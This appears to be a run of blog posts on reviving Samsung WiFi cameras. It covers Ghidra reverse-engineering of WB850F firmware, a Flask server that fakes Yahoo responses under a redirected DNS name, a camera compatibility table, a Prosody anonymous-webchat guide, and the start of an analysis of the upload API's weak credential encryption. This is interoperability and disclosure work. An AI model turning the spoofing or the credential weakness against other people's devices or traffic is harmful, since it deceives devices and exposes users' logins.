Resource.bin: MIPSEB-LE MIPS-III ECOFF executable stripped - version 0.0
OIS.bin: data
SKIN.bin: data
- ONBL1 and ONBL2 are probably the stages 1 and 2 of the bootloader (as confirmed by a string in Main_Image: "BootLoader(ONBL1, ONBL2) Update Done").
- Main_Image is the actual firmware: the OpenPGP Secret Key is a false positive, binwalk -A reports quite a number of ARM function prologues in this file.
- Resource and SKIN are pretty large containers, maybe provided by the SoC manufacturer to "skin" the camera UI?
- OIS is not really hex as claimed by its file name, but it might be the firmware for a dedicated optical image stabilizer.
Of all these, Main_Image is the most interesting one.
Loading the code in Ghidra
The three partitions ONBL1, ONBL2 and Main_Image contain actual ARM code. A typical ARM firmware will contain the reset vector table at address 0x0000000 (usually the beginning of flash / ROM), which is a series of jump instructions. All three binaries however contain actual linear code at their respective beginning, so most probably they need to be re-mapped to some yet unknown address.
To find out how and why the camera is mis-detecting a hotspot, we need to:
- Find the right memory address to map Main_Image to
- Load the symbol names from partialImage.o.map into Ghidra
- Find and analyze the function that is mis-firing the hotspot login
Loading and mapping Main_Image
By default, Ghidra will assume that the binary loads to address 0x0000000 and try to analyze it this way. To get the correct memory address, we need to find a function that accesses some known value from the binary using an absolute address. Given that there are 77k functions, we can start with something that's close to task #3, and search in the "Defined Strings" tab of Ghidra for "yahoo":
Excellent! Ghidra identified a few strings that look like an annoyed developer's printf debugging, probably from a function called DevHTTPResponseStart(), and it seems to be the function that checks whether the camera can properly access Yahoo, Google or Samsung:
0139f574 DevHTTPResponseStart: url=%s, handle=%x, status=%d\n, headers=%s\r\n
0139f5b8 DevHTTPResponseStart: This is YAHOO check !!!\r\n
0139f5f4 DevHTTPResponseStart: THIS IS GOOGLE/YAHOO/SAMSUNG PAGE!!!! 111\n\n\n
0139f638 DevHTTPResponseStart: 301/302/307! cannot find yahoo! safapi_is_browser_framebuffer_on : %d , safapi_is_browser_authed(): %d \r\n
According to partialImage.o.map, a function with that name actually exists at address 0x321a84, and Ghidra also found a function at 0x321a84. There are some more matching function offsets between the map and the binary, so we can assume that the .text addresses from the map file actually correspond 1:1 to Main_Image! We found the right island for our map!
Here's the beginning of that function:
bool FUN_00321a84(undefined4 param_1,ushort param_2,int param_3,int param_4) {
/* snip variable declarations */
FUN_0031daec(*(DAT_00321fd4 + 0x2c),DAT_00322034,param_3,param_1,param_2,param_4);
FUN_0031daec(*(DAT_00321fd4 + 0x2c),DAT_00322038);
FUN_00326f84(0x68);
It starts with two calls to FUN_0031daec() with different numbers of parameters - this smells very much of printf debugging again. According to the memory map, it's called opd_printf()! The first parameter is some sort of context / destination, and the second one must be a reference to the format string. The two DAT_ values are detected by Ghidra as 32-bit undefined values:
DAT_00322034:
74 35 3a c1 undefined4 C13A3574h
DAT_00322038:
b8 35 3a c1 undefined4 C13A35B8h
However, the respective last three digits match the "DevHTTPResponseStart: " debug strings encountered earlier:
- 0xc13a3574 - 0x0139f574 = 0xc0004000 (first format string with four parameters)
- 0xc13a35b8 - 0x0139f5b8 = 0xc0004000 (second format string without parameters)
From that we can reasonably conclude that Main_Image needs to be loaded to the memory address 0xc0004000. This cannot be changed after the fact in Ghidra, so we need to remove the binary from the project, re-import it, and set the base address accordingly:
Loading function names from partialImage.o.map
Ghidra has a script to bulk-import data labels and function names from a text table, ImportSymbolsScript.py. It expects each line to contain three variables, separated by arbitrary amounts of whitespace (as determined by Python's string.split()):
- symbol name
- (hexadecimal) address
- "f" for "function" or "l" for "label"
Our symbol map contains multiple sections, but we are only interested in the functions defined in .text (for now), which are mapped 1:1 to addresses in Main_Image. Besides function names, it also contains empty lines, object file offsets (with .text as the label), labels (prefixed with "L$_") and local symbols (prefixed with "$").
We need to limit our symbols to the .text section (everything after .text and before .debug_frame), get rid of the empty lines and non-functions, then add 0xc0004000 to each address so that we match up with the base address in Ghidra. We can do this very obscurely with an awk one-liner:
awk '/^\.text /{t=1;next}/^\.debug_frame /{t=0} ; !/[$.]/ { if (t && $1) { printf "%s %x f\n", $1, (strtonum("0x"$2)+0xc0004000) } }'
Or slightly less obscurely with a much slower shell loop:
sed '1,/^\.text /d;/^\.debug_frame /,$d' | grep -v '^$' | grep -v '[.$]' | \
while read sym addr f ; do
printf "%s %x f\n" $sym $((0xc0004000 + 0x$addr))
done
Both will generate the same output that can be loaded into Ghidra via "Window" / "Script Manager" / "ImportSymbolsScript.py":
sysInit c0004000 f
archPwrDown c0004094 f
MMU_WriteControlReg c00040a4 f
MMU_WritePageTableBaseReg c00040b8 f
MMU_WriteDomainAccessReg c00040d0 f
...
Reverse engineering DevHTTPResponseStart
Now that we have the function names in place, we need to manually set the type of quite a few DAT_ fields to "pointer", rename the parameters according to the debug string, and we get a reasonably usable decompiler output.
The following is a commented version, edited for better readability (inlined the string references, rewrote some conditionals):
bool DevHTTPResponseStart(undefined4 handle,ushort status,char *url,char *headers) {
bool result;
opd_printf(ctx,"DevHTTPResponseStart: url=%s, handle=%x, status=%d\n, headers=%s\r\n",
url,handle,status,headers);
opd_printf(ctx,"DevHTTPResponseStart: This is YAHOO check !!!\r\n");
safnotify_page_load_status(0x68);
if ((url == NULL) || (status != 301 && status != 302 && status != 307)) {
/* this is not a HTTP redirect */
if (status == 200) {
/* HTTP 200 means OK */
if (headers == NULL ||
(strstr(headers,"domain=.yahoo") == NULL &&
strstr(headers,"Domain=.yahoo") == NULL &&
strstr(headers,"domain=kr.yahoo") == NULL &&
strstr(headers,"Domain=kr.yahoo") == NULL)) {
/* no response headers or no yahoo cookie --> check fails! */
result = true;
} else {
/* we found a yahoo cookie bit in the headers */
opd_printf(ctx,"DevHTTPResponseData: THIS IS GOOGLE/YAHOO PAGE!!!! 3333\n\n\n");
*p_request_ongoing = 0;
if (!safapi_is_browser_authed())
safnotify_auth_ap(0);
result = false;
}
} else if (status < 0) {
/* negative status = aborted? */
result = false;
} else {
/* positive status, not a redirect, not "OK" */
result = !safapi_is_browser_framebuffer_on();
}
} else {
/* this is a HTTP redirect */
char *match = strstr(url,"yahoo.");
if (match == NULL || match > (url+11)) {
opd_printf(ctx, "DevHTTPResponseStart: 301/302/307! cannot find yahoo! safapi_is_browser_framebuffer_on : %d , safapi_is_browser_authed(): %d \r\n",
safapi_is_browser_framebuffer_on(), safapi_is_browser_authed());
if (!safapi_is_browser_framebuffer_on() && !safapi_is_browser_authed()) {
opd_printf(ctx,"DevHTTPResponseStart: 302 auth failed!!! kSAFAPIAuthErrNotAuth!! \r\n");
safnotify_auth_ap(1);
}
result = false;
} else {
/* found "yahoo." in url */
opd_printf(ctx, "DevHTTPResponseStart: THIS IS GOOGLE/YAHOO/SAMSUNG PAGE!!!! 111\n\n\n");
*p_request_ongoing = 0;
if (!safapi_is_browser_authed())
safnotify_auth_ap(0);
result = false;
}
}
return result;
}
Interpreting the hotspot detection
So to summarize, the code in DevHTTPResponseStart will check for one of two conditions and call safnotify_auth_ap(0) to mark the WiFi access point as authenticated:
- on a HTTP 200 OK response, the server must set a cookie on the domain ".yahoo.something" or "kr.yahoo.something"
- on a HTTP 301/302/307 redirect, the URL (presumably the redirect location?) must contain "yahoo." close to its beginning.
If we manually contact the queried URL, http://www.yahoo.co.kr/, it will redirect us to https://www.yahoo.com/, so everything is fine?
GET / HTTP/1.1
Host: www.yahoo.co.kr
HTTP/1.1 301 Moved Permanently
Location: https://www.yahoo.com/
Well, the substring "yahoo." is at position 12 in the URL "https://www.yahoo.com/", but the code requires it to be in one of the first 11 positions. This check has been killed by TLS!
To pass the hotspot check, we must unwind ten years of HTTPS-everywhere, or point the DNS record to a different server that will either HTTP-redirect to a different, more yahooey name, or set a cookie on the yahoo domain.
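As a rough sketch of the second option (placeholder host names, not the actual samsung-nx-emailservice patch), a tiny Flask app served under the DNS-redirected www.yahoo.co.kr could satisfy either branch of DevHTTPResponseStart:

from flask import Flask, make_response, redirect

app = Flask(__name__)

@app.route("/")
def yahoo_check():
    # Variant 1: 200 OK with a cookie whose attributes contain "domain=.yahoo",
    # which is the substring the firmware greps the response headers for.
    resp = make_response("OK")
    resp.headers.add("Set-Cookie", "B=1; domain=.yahoo.co.kr; path=/")
    return resp

@app.route("/redirect")
def yahoo_redirect():
    # Variant 2: a 302 whose target has "yahoo." within the first 11 characters
    # ("http://" is 7 characters, so the position check passes).
    return redirect("http://yahoo.invalid/", code=302)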
After patching samsung-nx-emailservice accordingly, the camera will actually connect and upload photos:
Summary: the real treasure
This deep-dive allowed us to understand and circumvent the hotspot detection in Samsung's WB850F WiFi camera based on one reverse-engineered function. The resulting patch was tiny, but guessing the workaround just from the packet traces was impossible due to the "detection method" implemented by Samsung's engineers. Once we knew what to look for, the same workaround was applied to cameras asking for MSN.com, thus also adding the EX2F, ST200F, WB3xF and WB1100F to the supported cameras list.
However, the real treasure is still waiting! Main_Image contains over 77k functions, so there is more than enough for a curious treasure hunter to explore in order to better understand how digital cameras work.
Starting in 2009, Samsung has created a wide range of compact cameras with built-in WiFi support, spread over multiple product lines. This is a reference and data collection of those cameras, with the goal to understand their WiFi functionality, and to implement image uploads on the go.
This is a follow-up to the Samsung NX mirrorless archaeology article, which also covers the Android-based compact cameras.
If you are in Europe and can donate one of the "untested" models, please let me know!
Model Line Overview
Samsung created a mind-boggling number of different compact cameras over the years, apparently with different teams working on different form factors and specification targets. They were grouped into product lines, of which only a few were officially explained:
- DV: DualView (with a second LCD on the front side for selfies)
- ES: unknown, no WiFi
- EX: high-end compact (maybe "expert"?)
- NV: New Vision, no WiFi
- MV: MultiView
- PL: unknown, no WiFi
- SH: unknown
- ST: Style feature
- WB: long-zoom models
Quite a few of those model ranges also featured cameras with a WiFi controller, allowing the user to upload pictures to social media or send them via email. For the WiFi-enabled cameras, Samsung has been using two different SoC brands, with multiple generations each:
- Zoran COACH ("Camera On A CHip"), based on a MIPS CPU.
- DRIM engine ("Digital Real Image & Movie Engine"), an ARM CPU based on the Milbeaut (later Fujitsu) SoC.
WiFi Cameras
This table should contain all Samsung compacts with WiFi (I did quite a comprehensive search of everything they released since 2009). It is ordered by SoC type and release date:
Camera | Release | SoC | Firmware | Upload Working |
---|---|---|---|---|
Zoran COACH (MIPS) | ||||
ST1000 | 2009-09 | COACH 10 | N/A | ❌ unknown serviceproviders API endpoint |
SH100 | 2011-01 | COACH ?? | 1107201 | ✔️ (fw. 1103021) |
ST200F | 2012-01 | COACH 12: ZR364249NCCG | 1303204 | ✔️ Yahoo (fw. 1303204(*)) |
DV300F | 2012-01 | COACH 12 | 1211084 | ✔️ (fw. 1211084) |
WB150F | 2012-01 | COACH 12 ML? | 1208074 | ✔️ (fw. 1210238) |
WB35F, WB36F, WB37F | 2014-01 | COACH 12: ZR364249BGCG | N/A | ✔️ MSN (WB37F fw. 1.60 and 1.72) |
WB50F | 2014-01 | COACH ?? | N/A | ✔️ MSN cookie (fw. 1.61) |
WB1100F | 2014-01 | COACH 12: ZR364249BGCG | N/A | ✔️ MSN (fw. 1.72?) |
WB2200F | 2014-01 | COACH ??: ZR364302BGCG | N/A | untested |
Milbeaut / DRIM engine (ARM) | ||||
WB850F | 2012-01 | DRIM engine III? | 210086 | ✔️ Yahoo (fw. 210086) |
EX2F | 2012-07 | DRIM engine III | 1301144 | ✔️ Yahoo (fw. 303194) |
WB200F | 2013-01 | Milbeaut MB91696 | N/A | ❌ hotspot (fw. 1411171) |
WB250F | 2013-01 | Milbeaut MB91696 | 1302211 | ✔️ (fw. 1302181) |
WB800F | 2013-01 | Milbeaut MB91696 | 1311061 | ✔️ MSN redirect (fw. 1308052) |
DV150F | 2013-01 | Milbeaut MB91696 | N/A | ✔️ MSN redirect (fw. 1310101) |
ST150F | 2013-01 | Milbeaut MB91696 | N/A | ✔️ MSN redirect (fw. 1310151) |
WB30F, WB31F, WB32F | 2013-01 | Milbeaut M6M2 (MB91696?) | 1310151 | ❌ hotspot (WB31F fw. 1411221) |
WB350F, WB351F | 2014-01 | Milbeaut MB865254? | N/A | ✔️ (WB351F fw. GLUANC1) |
WB380F | 2015-06? | Milbeaut MB865254? | N/A | ✔️ (fw. GLUANL6) |
Unknown / unconfirmed SoC | ||||
MV900F | 2012-07 | Zoran??? | N/A | untested |
DV180F | 2015? | same Milbeaut as DV150F? | N/A | untested |
Legend:
- ✔️ = works with samsung-nx-emailservice.
- ✔️ Yahoo/MSN = works with a respective cookie response.
- ❌ hotspot = camera mis-detects a hotspot with a login requirement, opens browser.
- untested = I wasn't (yet) able to obtain this model. Donations are highly welcome.
- pending = I'm hopefully going to receive this model soon.
- (*) the ST200F failed with the 1203294 firmware but worked after the upgrade to 1303204.
- "N/A" for firmware means, there are no known downloads / mirrors since Samsung disabled iLauncher.
- "fw. ???" means that the firmware version could not be found out due to lack of a service manual.
There are also quite a few similarly named cameras that do not have WiFi:
- DV300/DV305 (without the F)
- ST200 (no F)
- WB100, WB150, WB210, WB500, WB600, WB650, WB700, WB750, WB1000 and WB2100 (again, no F)
Hotspot Detection Mode
Most of the cameras only do a HTTP GET request for http://gld.samsungosp.com (shut down in 2021) before failing into a browser. This is supposed to help you log in to a WiFi hotspot so that you can proceed to the upload.
Redirecting the DNS for gld.samsungosp.com to my own server and feeding back a HTTP 200 with the body "200 OK", as documented in 2013, doesn't help to make it pass the detection.
There is nothing obvious in the PCAP that would indicate what is going wrong there, and blindly providing different HTTP responses only goes this far.
Brief Firmware Analysis
Samsung used to provide firmware through the iLauncher PC application, which downloaded them from samsungmobile.com. The download service was discontinued in 2021 as well. Most camera models never had alternative firmware download locations, so suddenly it's impossible to get firmware files for them. Thanks, Samsung.
The alternative download locations that I could find are documented in the firmware table above.
Obviously, the ZORAN and the DRIMe models have different firmware structures.
The ZORAN firmware files are called <model>-DSP-<version>-full.elf but are not actually ELF files. Luckily, @jam1garner already analyzed the WB35F firmware and created tools to dissect the ELFs.
Unfortunately, none of the inner ELFs seem to contain any strings matching the social media upload APIs known from reverse-engineering the upload API. Also, the MIPS disassembler seems to be misbehaving for some reason, detecting all addresses as 0x0:
int DevHTTPResponseData(int param_1,int param_2,int param_3)
{
/* snip variables */
if (uRam00000000 != 0) {
(*(code *)0x0)(0,param_1);
}
(*(code *)0x0)(0,param_1,param_3);
if (uRam00000000 != 1) {
(*(code *)0x0)(param_2,param_3);
...
The DRIMe firmware files follow different conventions. WB850F and EX2F images are uncompressed multi-partition files that are analyzed in the WB850F reverse engineering blog post.
All other DRIMe models have compressed DATA<model>.bin files like the NX mini, where an analysis of the bootloader / compression mechanism needs to be performed prior to analyzing the actual network stack.
Yahoo! Hotspot Detection
Some models (at least the ST200F and the WB850F) will try to connect to http://www.yahoo.co.kr/ instead of the Samsung server. The WB1100F will load http://www.msn.com/. Today, these sites will redirect to HTTPS, but the 2012 cameras won't manage modern TLS Root CAs and encryption, so they will fail instead:
Redirecting the Yahoo hostname via DNS will also make them connect to our magic server, but it won't be detected as proper Yahoo!, showing the hotspot detector. Preliminary reverse engineering of the uncompressed WB850F firmware shows that the code checks for the presence of the string domain=.yahoo in the response (headers). This is normally a part of a cookie set by the server, which we can emulate to pass the hotspot check.
Similarly, it's possible to send back a cookie for domain=.msn.com to pass the WB1100F check.
Screw the CORK
The Zoran models have a very fragile TCP stack. It's so fragile that it won't process an HTTP response served in two separate TCP segments (TCP is a byte stream, fragmentation into segments should be fully abstracted from the application). To find that out, the author had to compare the 2014 PCAP with the PCAPs from samsung-nx-emailservice line by line, and see that the latter will send the headers and the body in two TCP segments.
Luckily, TCP stacks offer an "optimization" where small payloads will be delayed by the sender's operating system, hoping that the application will add more data. On Linux, this is called TCP_CORK and can be activated on any connection. Testing it out of pure despair suddenly made at least the ST200F and the WB1100F work. Other cameras were only tested with this patch applied.
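A minimal illustration of the socket option (Linux-only; just the concept, not the project's actual patch):

import socket

def send_in_one_segment(sock: socket.socket, headers: bytes, body: bytes):
    # hold back ("cork") outgoing data until we are done writing ...
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 1)
    sock.sendall(headers)
    sock.sendall(body)
    # ... then un-cork, flushing headers and body together
    # (as a single segment, as long as they fit into the MSS)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, 0)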
GPS Cameras
Of the WiFi enabled models, two cameras are also equipped with built-in GPS.
The ST1000 (also called CL65 in the USA), Samsung's first WiFi model, comes with GPS. It also contains a location database with the names of relevant towns / cities in its firmware, so it will show your current location on screen. Looks like places with more than ~10'000 inhabitants are listed. Obviously, the data is from 2009 as well.
The WB850F, a 2012 super-zoom, goes even further. You can download map files from Samsung for different parts of the world and install the maps on the SD card. It will show the location of taken photos as well, but not from the ones shot with the ST1000.
And it has a map renderer, and might even navigate you to POIs!
WiFi Camcorders
Yes, those are a thing as well. It's exceptionally hard to find any info on them. Samsung also created a large number of camcorders, but it looks like only three models came with WiFi.
From a glance at the available firmware files, they also have Linux SoCs inside, but they are not built around the known ZORAN or DRIMe chips.
The HMX-S10/S15/S16 firmware contains a number of S5PC110 string references, indicating that it's the Exynos 3110 1GHz smartphone CPU that also powered a number of Android phones.
The QF20 and QF30 again are based on the well-researched Ambarella A5s. The internet is full of reverse-engineering info on action cameras and drones based on Ambarella SoCs of all generations, including tools to disassemble and reassemble firmware images.
The QF30 is using a similar (but different!) API to the one of the still cameras, but over SSL and without encrypting the sensitive XML elements, and does not accept the <Response> element yet.
Camera | Release | SoC | Firmware | Working |
---|---|---|---|---|
HMX-S10, HMX-S15, HMX-S16 | 2010-01 | Samsung S5PC110/Exynos 3110(??) | 2011-11-14 | untested |
HMX-QF20 | 2012-01 | Ambarella A5s | 1203160 | untested |
HMX-QF30 | 2013-01 | Ambarella A5s | 14070801 | ✔️ SSLv2 (fw. 201212200) |
Legend:
- ✔️ SSLv2 = sends request via SSLv2 to port 443, needs something like socat23
The goal of this post is to make an easily accessible (anonymous) webchat for any chatrooms hosted on a prosody XMPP server, using the web client converse.js.
Motivation and prerequisites
There are two use cases:
- Have an easily accessible default support room for users having trouble with the server or their accounts.
- Have a working "Join using browser" button on search.jabber.network
This setup will require:
- A running prosody 0.12+ instance with a muc component (chat.yax.im in our example)
- The willingness to operate an anonymous login and to handle abuse coming from it (anon.yax.im)
- A web server to host the static HTML and JavaScript for the webchat (https://yaxim.org/)
There are other places that describe how to set up a prosody server and a web server, so our focus is on configuring anonymous access and the webchat.
Prosody: BOSH / websockets
The web client needs to access the prosody instance over HTTPS. This can
be accomplished either by using
Bidirectional-streams Over Synchronous HTTP (BOSH)
or the more modern WebSocket.
We enable both mechanisms in prosody.cfg
by adding the following two
lines to the gloabl modules_enabled
list, they can also be used by
regular clients:
modules_enabled = {
...
-- add HTTP modules:
"bosh"; -- Enable BOSH access, aka "Jabber over HTTP"
"websocket"; -- Modern XMPP over HTTP stream support
...
}
You can check if the BOSH endpoint works by visiting the /http-bind/ endpoint on your prosody's HTTPS port (5281 by default). The yax.im server is using mod_net_multiplex to allow both XMPP with Direct TLS and HTTPS on port 443, so the resulting URL is https://xmpp.yaxim.org/http-bind/.
Prosody: allowing anonymous logins
We need to add a new anonymous virtual host to the server configuration. By default, anonymous domains are only allowed to connect to services running on the same prosody instance, so they can join rooms on your server, but not connect out to other servers.
Add the new virtualhost at the end of prosody.cfg.lua:
-- add at the end, after the other VirtualHost sections, add:
VirtualHost "anon.yax.im"
authentication = "anonymous"
-- to allow file uploads for anonymous users, uncomment the following
-- two lines (THIS IS NOT RECOMMENDED!)
-- modules_enabled = { "discoitems"; }
-- disco_items = { {"upload.yax.im"}; }
This is a new domain that needs to be made accessible to clients, so you also need to create an SRV record and ensure that your TLS certificate covers the new hostname as well, e.g. by updating the parameter list to certbot.
_xmpp-client._tcp.anon.yax.im. 3600 IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpps-client._tcp.anon.yax.im. 3600 IN SRV 5 1 443 xmpp.yaxim.org.
Converse.js webchat
Converse.js is a full XMPP client written in JavaScript. The default mode is to embed Converse into a website where you have a small overlay window with the chat, that you can use while navigating the site.
However, we want to have a full-screen chat under the /chat/ URL and use that to join only one room at a time (either the support room or a room address that was explicitly passed) instead. For this, Converse has the fullscreen and singleton modes that we need to enable.
Furthermore, Converse does not (properly) support parsing room addresses from the URL, so we are using custom JavaScript to identify whether an address was passed as an anchor, and fall back to the support room yaxim@chat.yax.im otherwise.
The following is based on release 10.1.6 of Converse.
- Download the converse tarball (not converse-headless) and copy the dist folder into your document root.
- Create a folder chat/ or webchat/ in the document root, where the static HTML will be placed.
- Create an index.html with the following content (minimal example):
<html lang="en">
<head>
<title>yax.im webchat</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="description" content="browser-based access to the xmpp/jabber chatrooms on chat.yax.im" />
<link type="text/css" rel="stylesheet" media="screen" href="/dist/converse.min.css" />
<script src="/dist/converse.min.js"></script>
</head>
<body style="width: 100vw; height: 100vh; margin:0">
<div id="conversejs">
</div>
<noscript><h1>This chat only works with JavaScript enabled!</h1></noscript>
<script>
let room = window.location.search || window.location.hash;
room = decodeURIComponent(room.substring(room.indexOf('#') + 1, room.length));
if (!room) {
room = "yaxim@chat.yax.im";
}
converse.initialize({
"allow_muc_invitations" : false,
"authentication" : "anonymous",
"auto_join_on_invite" : true,
"auto_join_rooms" : [
room
],
"auto_login" : true,
"auto_reconnect" : false,
"blacklisted_plugins" : [
"converse-register"
],
"jid" : "anon.yax.im",
"keepalive" : true,
"message_carbons" : true,
"use_emojione" : true,
"view_mode" : "fullscreen",
"singleton": true,
"websocket_url" : "wss://xmpp.yaxim.org:5281/xmpp-websocket"
});
</script>
</body>
</html>
Back in 2009, Samsung introduced cameras with Wi-Fi that could upload images and videos to your social media account. The cameras talked to an (unencrypted) HTTP endpoint at Samsung's Social Network Services (SNS), probably to quickly adapt to changing upstream APIs without having to deploy new camera firmware.
This post is about reverse engineering the API based on a few old PCAPs and the binary code running on the NX300. We are finding a fractal of spectacular encryption fails created by Samsung, and creating a PoC reference server implementation in python/flask.
Before Samsung discontinued the SNS service in 2021, their faulty implementation allowed a passive attacker to decrypt the users' social media credentials (there is no need to decrypt the media, as they are uploaded in the clear). And there were quite a few buffer overflows along the way.
Skip right to the encryption fails!
History
The social media upload feature was introduced with the ST1000 / CL65 model, and soon added to the compact WB150F/WB850F/ST200F and the NX series ILCs with the NX20/NX210/NX1000 introduction.
Ironically, Wi-Fi support was implemented inconsistently over the different models and generations. There is a feature matrix for the NX models with a bit of an overview of the different Wi-Fi modes, and this post only focuses on the (also inconsistently implemented) cloud-based email and social network features.
Some models like the NX mini support sending emails as well as uploading (photos only) to four different social media platforms, other models like the NX30 came with 2GB of free Dropbox storage, while the high-end NX1 and NX500 only supported sending emails through SNS, but no social media. The binary code from the NX300 reveals 16 different platforms, whereas its UI only offers 5, and it allows uploading of photos as well as videos (but only to Facebook and YouTube). In 2015, Samsung left the camera market, and in 2021 they shut down the API servers. However, these cameras are still used in the wild, and some people complained about the termination.
Given that there is no HTTPS, a private or community-driven service could be implemented by using a custom DNS server and redirecting the camera's traffic.
Back then, I took that as a chance to reverse engineer the more straightforward SNS email API and postponed the more complex-looking social media API until now.
Email API
The easy part about the email API was that the camera sent a single HTTP POST request with an XML form containing the sender, recipient and body text, and the pictures attached. To succeed, the API server merely had to return 200 OK. Also, the camera I was using (the NX500) didn't support any of the other services.
POST /social/columbus/email?DUID=123456789033 HTTP/1.0
Authorization:OAuth oauth_consumer_key="censored",oauth_nonce="censored",oauth_signature="censored=",oauth_signature_method="HmacSHA1",oauth_timestamp="9717886885",oauth_version="1.0"
x-osp-version:v1
User-Agent: sdeClient
Content-Type: multipart/form-data; boundary=---------------------------7d93b9550d4a
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Pragma: no-cache
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)
Host: www.ospserver.net
Content-Length: 1321295
-----------------------------7d93b9550d4a
content-disposition: form-data; name="message"; fileName="sample.txt"
content-Type: multipart/form-data;
<?xml version="1.0" encoding="UTF-8"?>
<email><sender>Camera@samsungcamera.com</sender><receiverList><receiver>censored@censored.com</receiver></receiverList><title><![CDATA[[Samsung Smart Camera] sent you files.]]></title><body><![CDATA[Sent from Samsung Camera.
language_sh100_utf8]]></body></email>
-----------------------------7d93b9550d4a
content-disposition: form-data; name="binary"; fileName="SAM_4371.JPG"
content-Type: image/jpeg;
<snip>
-----------------------------7d93b9550d4a
The syntax is almost valid, except that there is no epilogue (----foo--) after the image, just another boundary (----foo), so unpatched HTTP servers will not consider this a valid request.
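Since the epilogue is missing, a replacement server can't rely on a standard form parser. A minimal Flask sketch that splits the body on the boundary by hand (error handling omitted; this is an assumption about one possible approach, not the author's actual implementation):

from flask import Flask, request

app = Flask(__name__)

@app.route('/social/columbus/email', methods=['POST'])
def email():
    # split on the boundary ourselves instead of using a form parser,
    # since the camera never sends the closing "--boundary--" epilogue
    boundary = request.content_type.split('boundary=')[1].encode()
    xml = jpeg = None
    for part in request.get_data().split(b'--' + boundary):
        headers, _, body = part.partition(b'\r\n\r\n')
        if b'name="message"' in headers:
            xml = body.rstrip(b'\r\n')    # the <email/> XML document
        elif b'name="binary"' in headers:
            jpeg = body.rstrip(b'\r\n')   # the attached JPEG
    # TODO: actually deliver the mail / store the picture
    return "OK"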
Social media login
The challenge with the social media posting was that the camera sends multiple XML requests and parses the answers from XML documents in an unknown format, which can no longer be obtained from the wire after Samsung terminated the official servers. Another challenge was that the credentials are transmitted in an encrypted form, so the encryption needed to be analyzed (and possibly broken) as well. Here is the first request from the camera when logging into Facebook:
POST http://snsgw.samsungmobile.com/facebook/auth HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<Request Method="login" Timeout="3000" CameraCryptKey="58a4c8161c8aa7b1287bc4934a2d89fa952da1cddc5b8f3d84d3406713a7be05f67862903b8f28f54272657432036b78e695afbe604a6ed69349ced7cf46c3e4ce587e1d56d301c544bdc2d476ac5451ceb217c2d71a2a35ce9ac1b9819e7f09475bbd493ac7700dd2e8a9a7f1ba8c601b247a70095a0b4cc3baa396eaa96648">
<UserName Value="uFK%2Fz%2BkEchpulalnJr1rBw%3D%3D"/>
<Password Value="ob7Ue7q%2BkUSZFffy3%2BVfiQ%3D%3D"/>
<PersistKey Use="true"/>
4p4uaaq422af3"/>
<SessionKey Type="APIF"/>
<CryptSessionKey Use="true" Type="SHA1" Value="//////S3mbZSAQAA/LOitv////9IIgS2UgEAAAAQBLY="/>
<ApplicationKey Value="6a563c3967f147d3adfa454ef913535d0d109ba4b4584914"/>
</Request>
For the other social media platforms, the /facebook/ part of the URL is replaced with the respective service name, except that some apparently use OAuth instead of sending encrypted credentials directly.
Locating the code to reverse-engineer
Of the different models supporting the feature, the Tizen-based NX300 seemed to be the best candidate, given that it's running Linux under the hood. Even though Samsung never provided source code for the camera UI and its components, reverse-engineering an ELF binary running on a Linux host where you are root is a totally different game than trying to pierce a proprietary ARM SoC running an unknown OS from the outside.
When requesting an image upload, the camera starts a dedicated program, smart-wifi-app-nx300. Luckily, the NX300 FOSS dump contains three copies of it, two of which are not stripped:
~/TIZEN/project/NX300/$ find . -type f -name smart-wifi-app-nx300 -exec ls -alh {} \;
-rwxr-xr-x 1 5.2M Oct 16 2013 ./imagedev/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1 519K Oct 16 2013 ./image/rootdir/usr/bin/smart-wifi-app-nx300
-rwxr-xr-x 1 5.2M Oct 16 2013 ./image/rootdir_3-5/usr/bin/smart-wifi-app-nx300
Unfortunately, the actual logic is happening in libwifi-sns.so, of which all copies are stripped. There is a header file libwifi-sns/client_predefined.h provided (by accident) as part of the dev image, but it only contains the string values from which the requests are constructed:
#define WEB_XML_LOGIN_REQUEST_PREFIX "<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\""
#define WEB_XML_USER_PREFIX "<UserName Value=\""
#define WEB_XML_PW_PREFIX "<Password Value=\""
...
The program is also doing extensive debugging through /dev/log_main, including the error messages that we cause when re-creating the API.
We will load both smart-wifi-app-nx300 and libwifi-sns.so in Ghidra and use its pretty good decompiler to get an understanding of the code. The following code snippets are based on the decompiler output, edited for better understanding and brevity (error checks and debug outputs are stripped).
Processing the login credentials
When trying the upload for the first time, the camera will pop up a credentials dialog to get the username and password for the specific service:
Internally, the plain-text credentials and social network name are stored for later processing in a global struct gWeb, the layout of which is not known. The field names and sizes of gWeb fields in the following code blocks are based on correlating debug prints and memset() size arguments, and need to be taken with a grain of salt.
The actual auth request is prepared by the WebLogin function, which will resolve the numeric site ID into the site name (e.g. "facebook" or "kakaostory"), get the appropriate server name ("snsgw.samsungmobile.com" or a regional endpoint like na-snsgw.samsungmobile.com for North America), and call into WebMakeLoginData() to encrypt the login credentials and eventually create an HTTP POST payload:
bool WebMakeLoginData(char *out_http_request,int site_idx) {
/* snip quite a bunch of boring code */
switch (WebCheckSNSGatewayLocation(site_idx)) {
case /*0*/ LOCATION_EUROPE:
host = "snsgw.samsungmobile.com"; break;
case /*1*/ LOCATION_USA:
host = "na-snsgw.samsungmobile.com"; break;
case /*2*/ LOCATION_CHINA:
host = "cn-snsgw.samsungmobile.com"; break;
case /*3*/ LOCATION_SINGAPORE:
host = "as-snsgw.samsungmobile.com"; break;
case 4 /* unsure, maybe staging? */:
host = "sta.snsgw.samsungmobile.com"; break;
default: /* Asia? */
host = "as-snsgw.samsungmobile.com"; break;
}
Web_Encrypt_Init();
Web_Get_Duid(); /* calculate device unique identifier into gWeb.duid */
Web_Get_Encrypted_Id(); /* encrypt user id into gWeb.enc_id */
